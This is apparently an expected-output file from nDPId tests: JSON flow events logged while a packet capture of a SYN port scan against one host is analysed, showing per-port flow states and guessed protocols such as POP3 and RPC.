+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":109,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":109,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00790{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"","password":""}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00790{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"","password":""}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2160,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2160,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275056340,"flow_last_seen":1278275056401,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275056340,"flow_last_seen":1278275056401,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":119,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":119,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1034,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2170,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1034,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2170,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2170,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2170,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275059345,"flow_last_seen":1278275059407,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36061,"dst_port":113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275059345,"flow_last_seen":1278275059407,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36061,"dst_port":113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":125,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":125,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4224,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4224,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4224,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4224,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2179,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2179,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":135,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":135,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} 